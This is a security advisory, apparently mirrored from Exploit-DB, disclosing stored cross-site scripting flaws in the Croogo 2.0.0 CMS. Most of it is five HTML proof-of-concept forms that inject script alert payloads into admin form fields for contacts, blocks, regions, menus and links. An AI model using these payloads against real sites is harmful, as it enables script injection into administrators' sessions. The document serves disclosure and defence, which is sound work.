Croogo 2.0.0 Multiple Stored XSS Vulnerabilities

vendor:
Croogo
by:
Gjoko 'LiquidWorm' Krstic
7,5
CVSS
HIGH
Stored Cross-Site Scripting (XSS)
CWE
Product Name: Croogo
Affected Version From: 2.0.0
Affected Version To: 2.0.0
Patch Exists: YES
Related CWE: N/A
CPE: a:fahad_ibnay_heylaal:croogo:2.0.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Apache/2.4.7 (Win32), PHP/5.5.6, MySQL 5.6.14
2014
Croogo 2.0.0 Multiple Stored XSS Vulnerabilities

Croogo version 2.0.0 suffers from multiple stored cross-site scripting vulnerabilities. Input passed to several POST parameters is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.
Mitigation:

Input validation should be used to ensure that untrusted data is not allowed to be passed to the vulnerable POST parameters.
Source
Exploit-DB raw data:

<<<

Croogo 2.0.0 Multiple Stored XSS Vulnerabilities


Vendor: Fahad Ibnay Heylaal
Product web page: http://www.croogo.org
Affected version: 2.0.0

Summary: Croogo is a free, open source, content management system
for PHP, released under The MIT License. It is powered by CakePHP
MVC framework.

Desc: Croogo version 2.0.0 suffers from multiple stored cross-site
scripting vulnerabilities. Input passed to several POST parameters
is not properly sanitised before being returned to the user. This
can be exploited to execute arbitrary HTML and script code in a
user's browser session in context of an affected site.

Tested on: Apache/2.4.7 (Win32)
           PHP/5.5.6
           MySQL 5.6.14


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Zero Science Lab - http://www.zeroscience.mk
Macedonian Information Security Research And Development Laboratory


Advisory ID: ZSL-2014-5201
Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2014-5201.php

Vendor: http://blog.croogo.org/blog/croogo-210-released


26.07.2014

>>>


------------------------
(XSS #1)
--------
POST parameters:

 - data[Contact][title]
------------------------

<html>
  <!-- PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://localhost/croogo/admin/contacts/contacts/add" method="POST">
      <input type="hidden" name="_method" value="POST" />
      <input type="hidden" name="data[_Token][key]" value="2627e9e204ad6b878dbaf1c08d830c3e744d7e6e" />
      <input type="hidden" name="data[Contact][id]" value="" />
      <input type="hidden" name="data[Contact][title]" value=""><script>alert("XSS");</script>" />
      <input type="hidden" name="data[Contact][alias]" value="test" />
      <input type="hidden" name="data[Contact][email]" value="a@a.com" />
      <input type="hidden" name="data[Contact][body]" value="" />
      <input type="hidden" name="data[Contact][name]" value="" />
      <input type="hidden" name="data[Contact][position]" value="" />
      <input type="hidden" name="data[Contact][address]" value="" />
      <input type="hidden" name="data[Contact][address2]" value="" />
      <input type="hidden" name="data[Contact][state]" value="" />
      <input type="hidden" name="data[Contact][country]" value="" />
      <input type="hidden" name="data[Contact][postcode]" value="" />
      <input type="hidden" name="data[Contact][phone]" value="" />
      <input type="hidden" name="data[Contact][fax]" value="" />
      <input type="hidden" name="data[Contact][message_status]" value="0" />
      <input type="hidden" name="data[Contact][message_archive]" value="0" />
      <input type="hidden" name="data[Contact][message_notify]" value="0" />
      <input type="hidden" name="data[Contact][message_spam_protection]" value="0" />
      <input type="hidden" name="data[Contact][message_captcha]" value="0" />
      <input type="hidden" name="data[Contact][status]" value="0" />
      <input type="hidden" name="data[_Token][fields]" value="262e37f00fdd538ab98d168114e8befb72ba27ff%3AContact.id" />
      <input type="hidden" name="data[_Token][unlocked]" value="apply" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>


------------------------
(XSS #2)
--------
POST/PUT parameters:

 - data[Block][title]
 - data[Block][alias]
------------------------

<html>
  <!-- PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://localhost/croogo/admin/blocks/blocks/edit/10" method="POST">
      <input type="hidden" name="_method" value="PUT" />
      <input type="hidden" name="data[_Token][key]" value="bb5e47ab63281908e9783d9a20f66b7f56c573f3" />
      <input type="hidden" name="data[Block][id]" value="10" />
      <input type="hidden" name="data[Block][title]" value=""><script>alert(2);</script>" />
      <input type="hidden" name="data[Block][alias]" value=""><script>alert(3);</script>" />
      <input type="hidden" name="data[Block][region_id]" value="3" />
      <input type="hidden" name="data[Block][body]" value="1" />
      <input type="hidden" name="data[Block][class]" value="1" />
      <input type="hidden" name="data[Block][element]" value="1" />
      <input type="hidden" name="data[Role][Role]" value="" />
      <input type="hidden" name="data[Block][visibility_paths]" value="" />
      <input type="hidden" name="data[Block][params]" value="1" />
      <input type="hidden" name="data[Block][status]" value="1" />
      <input type="hidden" name="data[Block][show_title]" value="0" />
      <input type="hidden" name="data[Block][show_title]" value="1" />
      <input type="hidden" name="data[Block][publish_start]" value="0000-00-00 00:00:00" />
      <input type="hidden" name="data[Block][publish_end]" value="0000-00-00 00:00:00" />
      <input type="hidden" name="data[_Token][fields]" value="546f4a46648b8b32ea4c2b43a4a118ea7087e21b%3ABlock.id" />
      <input type="hidden" name="data[_Token][unlocked]" value="apply" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>


------------------------
(XSS #3)
--------
POST parameters:

 - data[Region][title]
------------------------

<html>
  <!-- PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://localhost/croogo/admin/blocks/regions/add" method="POST">
      <input type="hidden" name="_method" value="POST" />
      <input type="hidden" name="data[_Token][key]" value="a7d62c8c34e2a6414c3657c43790645dfdd63735" />
      <input type="hidden" name="data[Region][id]" value="" />
      <input type="hidden" name="data[Region][title]" value=""><script>alert(11);</script>" />
      <input type="hidden" name="data[Region][alias]" value="1" />
      <input type="hidden" name="data[_Token][fields]" value="4020bcbfbf5ba648b159ec8a4e166f53c1b58aa4%3ARegion.id" />
      <input type="hidden" name="data[_Token][unlocked]" value="apply" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>


------------------------
(XSS #4)
--------
POST parameters:

 - data[Menu][title]
 - data[Menu][alias]
------------------------

<html>
  <!-- PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://localhost/croogo/admin/menus/menus/add" method="POST">
      <input type="hidden" name="_method" value="POST" />
      <input type="hidden" name="data[_Token][key]" value="253c5c67942b2d126c886c9ac7a62ebf065cf42b" />
      <input type="hidden" name="data[Menu][id]" value="" />
      <input type="hidden" name="data[Menu][title]" value=""><script>alert(22);</script>" />
      <input type="hidden" name="data[Menu][alias]" value=""><script>alert(33);</script>" />
      <input type="hidden" name="data[Menu][description]" value="ZSL" />
      <input type="hidden" name="data[Menu][params]" value="1" />
      <input type="hidden" name="data[Menu][status]" value="1" />
      <input type="hidden" name="data[Menu][publish_start]" value="1" />
      <input type="hidden" name="data[Menu][publish_end]" value="1" />
      <input type="hidden" name="data[_Token][fields]" value="58685dc7a49f7617cffaa3a00ec4245516c5f9d3%3AMenu.id" />
      <input type="hidden" name="data[_Token][unlocked]" value="apply" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>


------------------------
(XSS #5)
--------
POST parameters:

 - data[Link][title]
------------------------

<html>
  <!-- PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://localhost/croogo/admin/menus/links/add/menu:6" method="POST">
      <input type="hidden" name="_method" value="POST" />
      <input type="hidden" name="data[_Token][key]" value="736e7539497307010b8cb8e70c44ec8a9798d0fb" />
      <input type="hidden" name="data[Link][id]" value="" />
      <input type="hidden" name="data[Link][menu_id]" value="6" />
      <input type="hidden" name="data[Link][parent_id]" value="" />
      <input type="hidden" name="data[Link][title]" value=""><script>alert(1);</script>" />
      <input type="hidden" name="data[Link][link]" value="1" />
      <input type="hidden" name="data[Role][Role]" value="" />
      <input type="hidden" name="data[Link][class]" value="scriptalert1script" />
      <input type="hidden" name="data[Link][description]" value="" />
      <input type="hidden" name="data[Link][rel]" value="" />
      <input type="hidden" name="data[Link][target]" value="" />
      <input type="hidden" name="data[Link][params]" value="" />
      <input type="hidden" name="data[Link][status]" value="0" />
      <input type="hidden" name="data[Link][publish_start]" value="" />
      <input type="hidden" name="data[Link][publish_end]" value="" />
      <input type="hidden" name="data[_Token][fields]" value="d662745abb348c763337f58c8c3c28bb1e8c014f%3ALink.id" />
      <input type="hidden" name="data[_Token][unlocked]" value="apply" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>